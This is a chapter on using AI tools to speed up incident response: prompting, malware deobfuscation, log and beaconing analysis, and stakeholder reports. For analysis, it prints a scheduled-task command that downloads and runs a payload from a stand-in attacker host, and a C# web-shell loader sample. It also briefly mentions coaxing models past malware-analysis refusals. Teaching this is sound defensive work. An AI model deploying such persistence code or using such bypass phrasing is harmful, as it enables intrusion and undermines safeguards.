1. Accelerating Incident Response with AI

Introduction

As I write this chapter at the beginning of 2026, the cybersecurity industry is rapidly adopting and deploying AI tools. The AI hype cycle is pervasive, with near-daily major announcements and claims from frontier model providers, cloud SaaS providers, and security vendors about integrating AI capabilities into their platforms. Products enter the market with fanfare, and quietly exit months later when expectations fail to match reality, and users find limited practical value.

Many of the deployments I see are a reaction to AI hype and leadership demands to integrate platforms and services with AI technology, without considering how these tools are actually valuable to users. Further, in my penetration testing work, many of these deployments lack appropriate safeguards against various attacks and fail to ensure the AI-generated content is accurate and defensible.

However, AI tools are also demonstrating significant value in accelerating incident response analysis when applied thoughtfully by skilled analysts.

This chapter will examine the practical applications of generative AI in accelerating common incident response tasks. The focus is on immediate, actionable techniques that analysts can apply to real investigations rather than theoretical possibilities or inaccessible market hype. The goal is to help incident responders leverage AI capabilities effectively while understanding the associated risks and limitations of these platforms.

AI Costs and Access

In this module, we’ll look at several examples of how AI can accelerate incident response tasks. Wherever possible, I’ve focused on techniques that use publicly accessible AI platforms with minimal cost. Many of the examples will use public frontier model providers from OpenAI, Anthropic, Google, or Microsoft.

These platforms often offer a free tier that allows analysts to experiment with AI capabilities without incurring costs. However, these free tiers are also limited and will likely exceed the usage quotas quickly when applied to real incident response tasks.

For sustained use, organizations will need to budget for access to an AI platform. This can be in the form of subscription plans, per-use API fees, or infrastructure costs for hosting open-weight models locally. Costs vary widely based on the specific platform, usage volume, and deployment approach.

Organizations should evaluate the cost-benefit tradeoffs of different AI deployment options based on their incident response needs, data sensitivity, and budget constraints. Start by experimenting with the free-tier to understand the potential value and usefulness before committing to paid plans or infrastructure investments.

Opportunities and Cautions

AI models demonstrate capabilities that directly address common bottlenecks in incident response workflows. Pattern recognition allows models to identify anomalies in log data, network traffic, or system behavior that analysts might overlook during manual review. Information synthesis combines data from multiple sources into coherent insights, reducing the cognitive load on analysts working with data from dozens of disparate systems. Models break complex technical problems into manageable components through abstraction, helping analysts approach challenging analysis tasks systematically. Large volumes of text-based data can be processed much faster than we can as human analysts. Technical findings can be translated into language appropriate for different audiences (executives, key stakeholders, end users, etc.) without requiring analysts to maintain multiple report versions.

These capabilities can meaningfully reduce Mean Time to Respond (MTTR) during active incidents. Tasks that previously required hours or days of manual analysis can often be completed in minutes with AI assistance.

Table 1. AI Capabilities and Limitations
Capability How It Helps Limitation to Consider

Pattern recognition

Identifies anomalies in logs, traffic, and system behavior

May generate false patterns in noisy data or miss subtle indicators

Information synthesis

Combines findings from multiple sources into coherent narratives

Can misinterpret relationships between events or draw incorrect conclusions

Abstraction

Breaks complex problems into manageable components

May oversimplify nuanced situations requiring expert judgment

Rapid processing

Analyzes large volumes of text-based data quickly

Speed does not guarantee accuracy; verification remains essential

Translation

Converts technical findings for different audiences

May omit critical details or use inappropriate tone without review

These opportunities come with important cautions. For example, AI models generate incorrect information with the same confidence they display when providing accurate information. These hallucinations introduce significant risk to the incident response process when AI-generated findings are accepted without verification.

IMPORTANT: Hallucinations in Large Language Models (LLMs) are a well-known threat that continues to challenge even the most advanced models. Offering incorrect information with confidence makes it difficult for users to identify when output is inaccurate.

Further, AI models are designed to be non-deterministic, where the same prompt produces different results each time the model is asked to solve a task. This variability can be valuable to users, enabling the exploration of multiple perspectives on a problem. However, this can also complicate the validation of findings, particularly when relying on the model’s output, as the user cannot independently verify the information.

Sharing incident data with commercial AI platforms also raises data handling concerns that may conflict with regulatory requirements or organizational policies. Organizations operating under strict compliance frameworks may find commercial AI platforms incompatible with their compliance obligations.

Training cutoff dates mean models lack current threat intelligence and may reference deprecated tools or outdated techniques. If the analyst does not recognize that the model’s knowledge is stale, they may accept recommendations that are no longer valid. Analysts should verify that recommended approaches remain current and applicable.

Recognizing these concerns, some organizations have banned AI platforms entirely. Even where organizational policy permits AI use, analysts should approach AI-assisted analysis with appropriate skepticism and verification practices. The goal in applying AI to incident response is to accelerate response time while mitigating the risks of incorrect or misleading outputs and data disclosure.

Data Handling Considerations

Before using AI tools with incident data, analysts should understand the data handling implications of different model types and deployment options.

Frontier Models

Commercial providers such as OpenAI, Anthropic, Google, and Microsoft offer the most capable AI systems. These frontier models demonstrate strong performance on code analysis, log interpretation, and report generation. Using frontier models requires sending data to external servers. Business and enterprise agreements with these providers typically include provisions that customer data will not be used for model training. [1]

However, even with no-training policies, prompt data may still be stored for quality assurance, abuse prevention, or logging purposes. This may be an unacceptable risk for decision-makers, given the sensitivity of incident data. Analysts should review the specific terms of service and data-handling policies for any AI platform used with incident data, and discuss the risks and opportunities of using commercial models with organizational decision-makers.

Open-Weight Models

Models such as DeepSeek, Meta’s Llama, or Microsoft’s Phi can be deployed locally, keeping all data within organizational control. Hosting open-weight models locally mitigates data exposure risks associated with commercial platforms, but requires significant technical resources to deploy and maintain. Server hardware with GPUs capable of running these models is expensive, and ongoing maintenance is required to keep models updated and running smoothly.

Some organizations choose to host open-weight models in cloud environments they control, balancing data protection with reduced infrastructure management overhead. While still exposing data to cloud providers, this approach avoids sharing data with third-party AI platform providers and may better align with organizational policies, especially when the organization already uses cloud infrastructure for other sensitive workloads.

In general, open-weight models offer less capability than frontier models. This is subject to some debate, as open-weight models continue to improve rapidly, and offer extensibility and transparency that commercial models lack. However, many open-weight models still lag behind frontier models in code analysis, log interpretation, and complex reasoning tasks, reducing the value of the opportunity in exchange for the data protection benefits.

Table 2. Comparison of AI Deployment Options
Factor Commercial Frontier Models Open-Weight Models (Cloud) Open-Weight Models (Local)

Capability

Highest performance on complex tasks

Moderate performance, improving rapidly

Moderate performance, improving rapidly

Data handling

Data sent to external provider

Data sent to cloud provider

All data remains on organizational infrastructure

Cost model

Per-use API fees

Compute costs for hosting

Infrastructure investment and ongoing compute

Setup complexity

Minimal - use web interface or API

Moderate - requires cloud deployment

High - requires local infrastructure and expertise

Best for

Organizations comfortable with commercial data handling policies

Organizations needing privacy with cloud infrastructure

Highly regulated environments

The choice between deployment options depends on organizational risk tolerance, regulatory requirements, technical capability, and budget. Many organizations adopt a hybrid approach, using commercial models for less-sensitive analysis and local models for regulated data.

When using commercial AI platforms with incident data, analysts can apply sanitization techniques to reduce exposure of sensitive information. Real IP addresses can be replaced with RFC 5737 TEST-NET documentation addresses such as 192.0.2.0/24, 198.51.100.0/24, or 203.0.113.0/24. Actual domain names can be substituted with example domains like example.com, example.net, or example.org. Personally identifiable information, credentials, and API keys should be redacted before including data in prompts. Organization names and employee identities can be anonymized, provided that this does not interfere with the analysis.

RFC 5737 documentation addresses are reserved for use in examples and documentation. Think of them like fake phone numbers (401-555-2911) used in movies. Where RFC 1918 IP addresses are used for real networks, RFC 5737 addresses are never assigned to real systems, making them safe to use for data sanitization.

These sanitization techniques reduce risk but do not eliminate it entirely. Patterns in sanitized data may still reveal information about infrastructure, architecture, or organizational practices. Analysts should verify that sanitization is appropriate for the incident’s sensitivity level.

IMPORTANT: Data sanitization is a complex field of study, with significant risks and trade-offs. Deanonymization attacks can re-identify sanitized data by correlating patterns with known information. A notable example of this technique is the deanonymization of the Netflix Prize dataset, demonstrating the risks of correlating public and anonymized data. [2] Organizations should consider that even anonymized data may still pose risks when shared with external AI platforms.

The decision between commercial and local models involves trade-offs between capability, convenience, and data protection requirements. Organizations should establish clear policies about what incident data can be shared with external AI platforms and under what circumstances.

Chapter Organization

This chapter progresses from simple to complex use cases for accelerating incident response activities using AI. Prompting foundations introduce techniques for effective interaction with AI models, establishing the communication patterns that make AI assistance productive. Foundational use cases cover web-based AI tools for code analysis, log review, and stakeholder communication that analysts can begin using immediately. Intermediate use cases explore structured prompts for playbook generation and report drafting, demonstrating how reusable templates accelerate recurring tasks. Advanced use cases examine automation through Model Context Protocol (MCP) integration and workflow orchestration for teams ready to embed AI into security operations infrastructure. Operational considerations address verification, documentation, and ongoing practice to ensure AI assistance remains reliable and defensible.

Each section builds on previous concepts. Analysts can start with straightforward applications and progress to more sophisticated integrations as comfort and organizational readiness permit. The techniques described work with current AI capabilities, but the underlying principles (clear communication, verification, appropriate use) will remain relevant as AI technology evolves.

Prompting Foundations

Prompting describes the process of refining instructions given to AI models to produce useful, accurate output. Working effectively with LLMs requires understanding how to communicate intent clearly, as poorly defined prompts tend to yield less useful or misleading results.

Quick Prompting Tips

The following techniques improve the quality of AI output for incident response tasks. These approaches can be used independently or combined for more complex requests. Mastering these foundational techniques enables analysts to obtain useful results from AI models without requiring a deep understanding of model architecture or training methods.

Table 3. Quick Prompting Techniques for Incident Response
Technique Example

Iterative prompting

Start broad, then refine: "Explain this code." → "Focus on the network communication functions." → "Summarize for a non-technical audience in three sentences."

Use delimiters

"Analyze the log entries delimited by triple quotes below." Delimiters help models distinguish instructions from data.

Request structured output

"Return findings as a JSON array with keys: timestamp, finding, severity, recommendation."

Assign a role

"You are a cybersecurity incident response analyst with expertise in Windows forensics and malware analysis."

Use Chain of Thought (CoT) reasoning

"Think step-by-step about how this attack progressed through the environment before summarizing your findings."

Ask what’s needed

"I want to analyze this log file for signs of credential theft. What information do you need from me to help with this analysis?"

ChatGPT conversation showing a credential theft analysis prompt with an uploaded JSON sign-in log file
Figure 1. ChatGPT Prompt for Log File Analysis

Iterative prompting is particularly valuable for refining AI output and learning how to interact with models effectively. Initial AI output rarely matches exactly what the analyst needs. Effective use of AI involves reviewing output, identifying what additional refinement would improve it, and issuing follow-up prompts that build on previous responses. This conversational approach often yields better results than crafting a single comprehensive prompt.

Analysts should experiment with these techniques on low-stakes tasks before applying them to active investigations. Practicing effective prompting during quiet periods builds skills that become valuable during time-sensitive incidents.

Structured Prompts for Complex Tasks

Simple prompts of one or two sentences work well for straightforward requests. More sophisticated tasks benefit from structured prompts that provide explicit guidance across multiple dimensions. These structured prompts can be saved, refined over time, and reused as part of standard workflows. More complex prompts are often used for AI platform integration, guiding the model to produce the desired output that meets a specific application’s needs.

Structured prompts typically include several elements that shape the model’s thinking to a desired output format and structure. The role and objective sections set expectations for the model’s persona and mission, helping to frame the appropriate level of technical depth and perspective. Instructions and constraints provide explicit guidance on what to do and what to avoid, reducing ambiguity that might lead to off-topic responses. Reasoning steps invoke chain-of-thought processing for complex analysis, encouraging the model to work through problems systematically rather than jumping to conclusions. Output format definitions ensure consistency across multiple uses of the same prompt, making results easier to compare and integrate into workflows. Examples show the model what good output looks like, significantly improving quality through one-shot or few-shot learning (providing one or a few examples to guide the model’s behavior). Context sections include relevant background information that the model would not otherwise have access to. Summary sections reiterate key constraints to address recency bias, which can lead models to give disproportionate weight to information at the end of prompts.

Structured prompts often use Markdown formatting with headers to help the model parse directions effectively. For complex content within prompts, XML-style tags can differentiate instructions from data, as shown in the example in Listing 1.

Listing 1. Structured Prompt for IOC Extraction
# Task
Extract indicators of compromise from the threat report below.

<report>
This report details adversaries deploying novel AI-enabled malware in active operations. APT28 (FROZENLAKE) deployed PROMPTSTEAL malware against Ukraine using Hugging Face API to query Qwen2.5-Coder-32B-Instruct LLM for command generation. VirusTotal hash: 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777

UNC1069 (MASAN) conducted cryptocurrency theft campaigns researching wallet locations and credential extraction. TEMP.Zagros exposed their C2 domain malicious-c2.example.com and encryption keys while requesting help with encrypted C2 scripts. APT42 developed phishing campaigns targeting think tanks using translation assistance and data processing agents.
</report>

# Output Requirements
- File hashes (MD5, SHA1, SHA256)
- Domain names and IP addresses
- Malware family names
- Threat actor identifiers

Format as a table with columns: Indicator Type, Value, Associated Threat Actor

Developing effective structured prompts requires iteration. Start without examples and refine based on output. Manually edit the best output to match the desired format, then use the edited version as an example in subsequent prompts. Consider developing a library of saved and refined prompts for common incident response tasks, treating them as reusable tools alongside scripts and detection rules.

Version control systems like Git work well for managing prompt libraries. Teams can track prompt evolution, share improvements, and maintain different versions for different AI platforms or use cases.

Foundational Use Cases

Next, let’s look at several foundational use cases that demonstrate opportunities to accelerate incident response using AI through standard web interfaces from providers like OpenAI, Anthropic, or Google. These approaches require no special integration or technical setup beyond access to a commercial generative AI platform. Analysts can begin applying these techniques immediately to accelerate analysis tasks and improve productivity.

Many commercial AI platforms offer a free-tier that allows analysts to experiment with capabilities without incurring costs. Alternatively, open-weight models can be hosted locally or in cloud environments under organizational control when data privacy requirements preclude the use of commercial platforms.

Code Analysis and Deobfuscation

Incident responders frequently encounter unfamiliar code during investigations: malware samples, attacker scripts, persistence mechanisms, and exploitation tools. Understanding what this code does is essential for scoping, containment, and eradication, but not every analyst has expertise in every programming language attackers might use.

AI models excel at explaining code in plain language, making this capability immediately valuable for incident response. The model can describe what code does, identify malicious functionality, and decode obfuscated content that would require significant manual effort to analyze.

Analyzing Obfuscated PowerShell

Consider a scenario in which an analyst discovers a suspicious scheduled task during an investigation, as shown in Listing 2. The task executes PowerShell with parameters that are not immediately clear:

Listing 2. Windows Scheduled Task Command Runs PowerShell
schtasks /create /tn "Windows Security Audit" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"IEX ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -Uri 'http://attackerc2.tld/payload.ps1' -UseBasicParsing).Content))\"" /sc onevent /ec Security /mo "*[System[EventID=4625]]" /ru SYSTEM /f

Using the benefits of LLM analysis, an analyst can provide this command to an AI model with a prompt requesting insight in plain language, as shown in the example in Listing 3.

Listing 3. Code Analysis Prompt
Explain what the Windows command does in triple quotes below. Identify any malicious or suspicious functionality. Break down each component of the command and explain its purpose.

```
schtasks /create /tn "Windows Security Audit" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"IEX ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -Uri 'http://attackerc2.tld/payload.ps1' -UseBasicParsing).Content))\"" /sc onevent /ec Security /mo "*[System[EventID=4625]]" /ru SYSTEM /f
```

Using Google Gemini, the model provides the analysis shown in Figure 2, explaining that the command creates a scheduled task that runs a hidden PowerShell script whenever a failed login event occurs.

Google Gemini response identifying persistence and lateral movement indicators in Windows scheduled task commands
Figure 2. Google Gemini Analysis of Schtasks and PowerShell Commands

This command is a classic example of persistence and lateral movement techniques used by attackers. It schedules a task that triggers automatically when a specific security event occurs.

The most suspicious aspect is that it monitors for failed login attempts to execute a hidden payload from a remote server with the highest possible system privileges.

Suspicious & Malicious Indicators

Remote Payload Execution: It uses IEX (Invoke-Expression) to download and run a script directly from a suspicious URL (attackerc2.tld). This is a common "fileless" malware technique.

Privilege Escalation: The task runs as SYSTEM, giving the attacker full control over the machine.

Stealth: It uses the -WindowStyle Hidden flag to ensure the user never sees a PowerShell window pop up.

Event Triggering: By triggering on Event ID 4625 (Failed Login), the attacker can effectively "summon" the malware remotely just by attempting to log in with a wrong password.

This analysis, which might take an experienced analyst several minutes to perform manually, can be completed in seconds with AI assistance. The analyst can then ask follow-up questions to explore specific aspects, such as the significance of triggering on Event ID 4625, how to detect this scheduled task using PowerShell, or what artifacts this would leave on the system.

For less experienced analysts, AI code analysis provides a way to understand unfamiliar programming languages and techniques without requiring deep expertise in every language attackers might use. The AI platform also serves as a teaching tool, allowing analysts to learn new techniques and languages through guided exploration after the initial analysis.

Verification Is Non-Negotiable

AI code analysis provides valuable acceleration but requires verification before acting on findings or documenting them as factual conclusions.

Models can misidentify functions, incorrectly describe behavior, or miss important details. A model might confidently state that code performs one action when it actually performs a different one. These hallucinations appear authoritative, making them particularly dangerous if accepted without verification.

Analysts should verify the analysis provided by AI models:

  • Cross-reference AI explanations with official documentation for APIs and commands.

  • Use different AI platforms to compare findings, reducing the risk of model-specific hallucinations and other errors.

  • Test code behavior in isolated environments when safe to do so.

  • Treat AI analysis as a starting point for investigation, not a final conclusion.

Never use unverified AI output for legal documentation, regulatory attestations, or communications where accuracy has material consequences. AI accelerates analysis; human verification is required to ensure accuracy.

Iterative Analysis for Complex Artifacts

More complex code samples benefit from iterative prompting. Start with a general explanation request, then drill into specific functions, decode encoded content, or request analysis from particular perspectives such as detection, eradication, or hunting for similar artifacts.

When analyzing malware with payloads, an analyst might begin with an initial prompt asking the model to explain the code’s overall behavior. A follow-up prompt can ask the model decode Base64 content from a specific variable and explain what it contains. Subsequent prompts might ask what network indicators could be used to detect this malware, or request a summary of findings for a non-technical audience. Each iteration builds context from previous responses, allowing deeper analysis without re-explaining the entire artifact. The conversational nature of AI interactions naturally supports this progressive refinement.

For example, consider a C# malware sample that includes obfuscated encoding and payloads, as shown in the example in Listing 4.

Listing 4. C# Malware Sample with Obfuscation
void Page_Load(object sender, EventArgs e)
{
    string p = "42a9798b99d4afcec9995e47a1d246b98ebc96be7a732323eee39d924006ee1d";
    string r = Request.Form["data"];
    // Obfuscated assembly bytes, approximately 1 KB, removed for brevity
    byte[] a = {0x79,0x68,0xf1,0x39,0x34,0x39,0x38,0x62,0x3d,0x39,0x64,0x34,0x9e,0x99,0x63,0x65,0xdb,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x21,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0xe5,0x65,0x31,0x64,0x3a,0x2d,0xdb,0x37,0x37,0x8d,0x31,0xaf,0x18,0x81,0x65,0x78,0xac,0x47,0x37,0xd,0xa,0x4a,0x19,0x49,0x47,0xa,0x53,0x45,0x0,0x5c,0x44,0x51,0x55,0x58,0xc,0x56,0x4c,0x45,[...],0x30,0x36,0x65,0x65,0x31,0x64};
    for(int i = 0; i < a.Length; i++) a[i] ^= (byte)p[i % p.Length];
    Assembly aS = Assembly.Load(a);
    object o = aS.CreateInstance("SharPy");
    MethodInfo mi = o.GetType().GetMethod("Run");
    object[] iN = new object[] {r, p};
    object oU = mi.Invoke(o, iN);
    Response.Write(oU);
}

Using ChatGPT or another AI platform, the analyst can iteratively explore this code. After attaching the code as a file, I used an initial prompt to request a high-level explanation of what the code does, as shown in Figure 3. ChatGPT returned an overview of the functionality, including insight into the large block of bytes declared as an array a.

ChatGPT explaining uploaded C# code as ASP.NET code-behind that executes on every page request
Figure 3. Code Analysis Prompt for C# Malware

4) It defines a giant blob of bytes (encrypted payload or lookup table)

byte[] a = { 0x79, 0x68, 0xf1, 0x39, …​ };

This enormous byte array is almost certainly not legitimate application code. Patterns here strongly suggest:

  • encrypted/compressed data embedded in source

  • or an obfuscated second-stage payload

  • or a keyed decoding table

  • or "dead drop" data that gets transformed + executed

This is exactly the kind of thing you see in a web shell loader: keep the real logic hidden inside a blob so casual review doesn’t reveal it.

ChatGPT provides valuable insight for the analyst, suggesting we may be seeing a web shell loader. However, it doesn’t give us the specifics of what the obfuscated payload does. Using iterative prompting techniques, a follow-up prompt can ask the model to analyze how the byte array a is used in the code, as shown in Figure 4.

ChatGPT follow-up response identifying XOR-obfuscated .NET assembly embedded as byte array in the C# script
Figure 4. Follow-up Prompt for C# Malware Analysis

What the decrypted bytes actually are

If you apply the XOR step, the resulting byte stream starts with the classic Windows PE header:

bytes 0-1 become MZ

and inside it contains the standard .NET metadata marker (BSJB) and framework string like v2.0.50727. That’s how you know this is a real .NET assembly, not random noise.

What that embedded assembly appears to do

When you inspect the decrypted assembly’s embedded strings, you see identifiers like:

  • runtime_compiler_xor.dll

  • SharPy

  • Xor_Enc_Dec

  • FromBase64String

  • Microsoft.CSharp

  • CSharpCodeProvider

  • System.CodeDom.Compiler

  • CompileAssemblyFromSource

  • System.Reflection

Those are a pretty specific combo: it’s set up to accept code/content at runtime, decode/decrypt it (Base64 + XOR), compile it (CodeDom / CSharpCodeProvider), then execute it via reflection.

Additional iterations could explore any programming terms unfamiliar to the analyst, what artifacts this malware leaves behind, how to detect it, or request a summary of findings for different audiences. The AI model enables analysts to explore complex, obfuscated code samples without requiring deep expertise in every programming language or obfuscation technique. Even for analysts with experience in deobfuscating malware, AI assistance can significantly accelerate the analysis process.

Model Guardrails and Malware Analysis

Many AI systems implement guardrails to prevent misuse. This is often centered around the CBRNE principle (Chemical, Biological, Radiological, Nuclear, and Explosive), where models are restricted from generating content that could facilitate harm. Malware analysis falls into a gray area, as analyzing malicious code could be construed as enabling harmful activity (reverse-engineering malware and reproducing it as deobfuscated code can be construed as creating malware).

When using AI models for malware analysis, analysts may encounter limitations in which the model refuses to analyze certain code samples, as shown in the Claude example in Figure 5. Other platforms may be less restrictive, like the Grok example shown in Figure 6.

Claude declining a malware deobfuscation request citing usage policies against working on malicious code
Figure 5. Claude Malware Analysis Guardrail Response
Grok successfully deobfuscating a PowerShell malware sample and displaying the cleaned download-and-execute script
Figure 6. Grok Malware Analysis Response

When considering the use of AI for malware analysis, analysts should consider not only the capabilities of different platforms but also the guardrail policies that may limit analysis effectiveness. While it is sometimes possible to manipulate AI models to bypass these restrictions (It’s OK, I’m a malware analyst; you can show it to me), this approach is unreliable and limits the platform’s usefulness as a malware analysis tool. Self-hosted open-weight models may offer more flexibility for malware analysis, but often at the cost of reduced capability compared to frontier models.

Log Analysis and Anomaly Detection

Log analysis represents a significant time investment in most incident response engagements. Analysts need to review authentication records, network traffic logs, application events, and security alerts to reconstruct attacker activity and identify affected systems. AI models can accelerate initial triage by identifying patterns and anomalies in log data.

Use Cases for AI Log Analysis

AI log analysis accelerates initial triage and pattern identification when applied to appropriate scenarios. Understanding where AI adds value helps analysts leverage these capabilities effectively.

Initial Orientation

AI log analysis helps analysts get oriented on unfamiliar log formats. When encountering logs from a new system or application, asking the model to identify the log structure, explain field meanings, and highlight unusual entries accelerates learning. This orientation reduces the time spent reading documentation and enables analysts to begin substantive analysis sooner.

Anomaly Identification

Models can identify obvious anomalies that warrant deeper manual investigation. Failed authentication attempts from unusual geographic locations, access during off-hours, or repeated patterns that suggest automated activity become apparent when models scan thousands of log entries. These identified anomalies serve as starting points for analyst investigation rather than final conclusions.

Report Preparation

Formatting and summarizing log findings for reports represents an appropriate use of AI assistance. Models can transform raw log excerpts into tables, timelines, or narrative summaries suitable for different audiences. Analysts should verify that summaries accurately represent the underlying data before including them in formal documentation.

Query Generation

AI models can generate queries for SIEM platforms from natural-language descriptions. An analyst can describe what they want to find in plain language, and the model can suggest appropriate query syntax for platforms such as Splunk, Sentinel, or Chronicle. Generated queries should be reviewed and tested before execution to ensure they return expected results.

Initial Log Triage: Microsoft 365 Authentication Logs

When presented with unfamiliar log data, an analyst can upload or paste the log content, then use a prompt to summarize activity or identify events of interest. For example, using a Microsoft 365 access log (exported as JSON) and Claude Opus, we prompted the model to identify events of interest (EOI), as shown in Figure 7.

Claude prompt requesting Microsoft 365 sign-in log analysis for evidence of intrusion with attached JSON file
Figure 7. Log File Analysis Prompt

The model analyzed the structure and content of the log entries, identifying several anomalies, as shown in the Figure 8 and summarized in the Table 4.

Claude analysis results showing password spray findings table with compromised account and suspicious admin activity
Figure 8. Log File Analysis Response
Table 4. Microsoft 365 Authentication Log Analysis Summary
Timestamp (UTC) IP Address ASN Location App Result

02:51:01

3.12.217.120

16509 (AWS)

Columbus, OH

Microsoft Office

FAIL

03:35:24

3.12.217.149

16509 (AWS)

Columbus, OH

Azure PowerShell

FAIL

03:37:10

44.210.66.209

14618 (AWS)

Ashburn, VA

Authenticator App

FAIL

03:38:14

3.15.35.2

16509 (AWS)

Columbus, OH

Azure CLI

FAIL

03:39:18

3.15.35.215

16509 (AWS)

Columbus, OH

Visual Studio

FAIL

03:40:22

3.12.216.177

16509 (AWS)

Columbus, OH

Azure CLI

SUCCESS

12:06:25

173.166.135.199

7922 (Comcast)

Columbia, MD

Edge Browser

SUCCESS

12:06:48

173.166.135.199

7922 (Comcast)

Columbia, MD

Edge Browser

SUCCESS

Here we see that, after five failed spray attempts, the attacker successfully authenticated at 03:40:22 via Azure CLI from AWS. The legitimate user later logged in from Maryland approximately eight hours after the compromise, unaware of the intrusion.

This initial triage can help analysts prioritize where to focus detailed manual analysis. Rather than reviewing thousands of log entries sequentially, the analyst can focus on the specific patterns and time windows the AI identified as anomalous, referring back to the original logging data or SIEM as needed for verification.

Beaconing Detection: Network Proxy Data

Network proxy logs can reveal command-and-control communication through beaconing patterns. Beaconing traffic exhibits regular timing patterns that distinguish it from more typical network traffic, but identifying these patterns in large log files containing tens of thousands of entries requires significant manual analysis.

An analyst reviewing proxy logs for suspected C2 beaconing can upload the log file and request analysis using a prompt, such as the one shown in Figure 9.

Claude prompt with attached proxy access log requesting beaconing behavior analysis with specific detection criteria
Figure 9. Beaconing Detection Prompt

In this example, Claude Opus analyzed the proxy log structure and identified the need for statistical analysis to detect beaconing behavior based the regularity of request intervals. Rather than providing a simple pattern match, the model recognized that effective beaconing detection would require calculating the coefficient of variation for request intervals to distinguish machine-generated traffic from human browsing. It then generated a Python script to perform this analysis, as shown in Figure 10.

Claude generating a Python beaconing detection script with suspicious domain analysis logic
Figure 10. Beaconing Analysis Python Script

After the analysis, the model identified critical findings, as shown in the Figure 11, including two highly suspicious domains exhibiting C2 beaconing behavior.

Claude beaconing analysis results identifying a typosquat C2 domain with five-second interval automated requests
Figure 11. Beaconing Analysis Results

The analysis revealed multiple compromised hosts communicating with suspected C2 infrastructure, including a typosquat domain masquerading as Google Analytics services. The model integrated online cyber threat intelligence during its analysis, identifying that www1-google-analytics.com used a common typosquatting technique with the www1- prefix to deceive users and security tools. Key findings from the analysis are summarized in the Table 5.

Table 5. Beaconing Detection Findings Summary
Domain Suspicious Indicators Beacon Interval Affected Hosts Confidence

www1-google-analytics.com

Typosquat domain, HTTP protocol (not HTTPS), extremely regular intervals (CV=0.02), high volume (9,075 requests)

~5 seconds

4 hosts

Very High

email.falsimentis.com

Unknown domain, HTTP protocol, near-perfect 60-second intervals (CV=0.004), POST method with query string

~60 seconds

4 hosts

High

This example demonstrates how AI models can not only identify suspicious patterns but also determine the appropriate analytical approach, implement the analysis methodology, and integrate external threat intelligence to provide comprehensive findings that would traditionally require manual statistical analysis and open-source intelligence gathering.

Limitations and Considerations

AI log analysis can accelerate incident response, but it also has several inherent limitations that analysts should understand when evaluating findings.

Incomplete Detection

Models may miss subtle indicators that experienced analysts would recognize. Complex attack patterns, novel techniques, or carefully crafted evasion methods might escape detection when relying solely on AI analysis. AI serves as a valuable first-pass triage tool, not a comprehensive security control.

False Positive Risk

Models can generate false-positive alerts that mislead the analysis team and waste valuable time during response efforts. Legitimate but unusual patterns may be flagged as suspicious, requiring analysts to verify each finding before taking action.

Lack of Definitive Conclusions

AI log analysis may struggle to provide definitive conclusions about attacker activity. Models that lack the contextual understanding for authoritative attribution often hedge assertions with may be or looks like, leaving it up to the analyst to make an impact assessment. Thorough manual review remains essential for critical investigations.

Context Window Constraints

AI models operate within fixed context window limits that constrain how much log data can be analyzed in a single interaction. Frontier models like Claude Opus 4.5 support context windows of 200,000 tokens, roughly equivalent to 150,000 words or 500 pages of text. While substantial, this limit poses challenges when analyzing enterprise log collections that routinely contain millions of entries.

Direct analysis approaches work well for focused investigations involving small to medium log sets. An analyst can attach several thousand lines of authentication logs, proxy records, or application events to a chat interface and receive useful pattern analysis within the model’s context window. This approach suits initial triage, spot checks, or targeted investigations where relevant log segments have already been identified.

However, comprehensive log analysis during major incidents often requires processing volumes that exceed context window capacity. Analyzing a week of authentication logs from an enterprise directory service, reviewing firewall logs across multiple network boundaries, or correlating application logs from distributed systems generates data volumes that cannot fit in a single model interaction.

For large-scale log analysis, agentic approaches offer solutions that overcome limitations of context windows. Agent-based systems can process log data iteratively, analyzing segments within context window constraints and maintaining state across multiple interactions. We’ll explore these use cases in Section 1.5.2.

Translating Technical Findings for Stakeholders

Incident response teams need to communicate with diverse audiences: executive leadership needs business-impact summaries, legal teams need specific technical details for regulatory filings, and stakeholders need clear guidance on service disruptions. Producing the messaging that meets each audience’s needs can be challenging. Analysts skilled at digital forensics, threat hunting, and vulnerability assessment are not always equally proficient at technical writing and audience-appropriate communication.

This is another opportunity for analysts to leverage AI models, accelerating the writing of documents, reports, summaries, and status reports for different stakeholders.

Executive Summary Generation

Given a technical timeline of attacker activity, an analyst can use a model to transform the details into executive-appropriate language. For example, consider the prompt shown in Listing 5, which outlines a timeline of attacker activity following a workstation breach, including lateral movement and data exfiltration prior to detection.

Listing 5. Executive Summary Generation Prompt
Transform the following technical incident timeline into an executive summary suitable for senior leadership. Focus on business impact, risk exposure, and response actions. Avoid technical jargon. The summary should be no more than five bullet points.

Technical Timeline:

- 2026-01-07 14:32 Initial access via phishing email to user jwalcott@falsimentis.com on FM-CEO
- 2026-01-07 14:45 Malware execution, C2 beacon established to 203.0.113.47
- 2026-01-07 15:12 PowerShell script execution for credential harvesting from Chrome local storage
- 2026-01-07 15:34 Lateral movement to file server FM-FS01 using harvested credentials
- 2026-01-07 16:02 Data staging, 2.3GB archived to C:\Users\Public\backup.zip
- 2026-01-07 16:18 Data exfiltration to Box.com cloud storage
- 2026-01-07 16:45 Possible infostealer binary executed on FM-FS01
- 2026-01-07 16:45 FM-FS01 EDR alert triggered, investigation initiated

Using ChatGPT, the model produces the executive summary shown here:

  • Confirmed security incident with unauthorized access began when an employee was tricked into opening a malicious email, allowing an external actor to gain access to a company device and then expand into a critical internal file server.

  • Business risk includes potential data exposure: approximately 2.3GB of company data was collected and appears to have been transferred outside the organization to a third-party cloud storage service, creating potential confidentiality, regulatory, and contractual impact.

  • The attacker attempted to capture account credentials (saved login information) and used them to move deeper into the environment, increasing the risk of continued access to additional systems beyond what has been identified so far.

  • Security monitoring detected the activity and triggered an alert, prompting the organization to begin incident response actions, including investigation and containment efforts focused on preventing further access and limiting additional data loss.

  • Immediate response priorities are to confirm exactly what data was accessed, secure affected accounts and systems, assess legal/notification obligations if sensitive data is involved, and implement additional controls to reduce the likelihood of recurrence (e.g., stronger email protections and access safeguards).

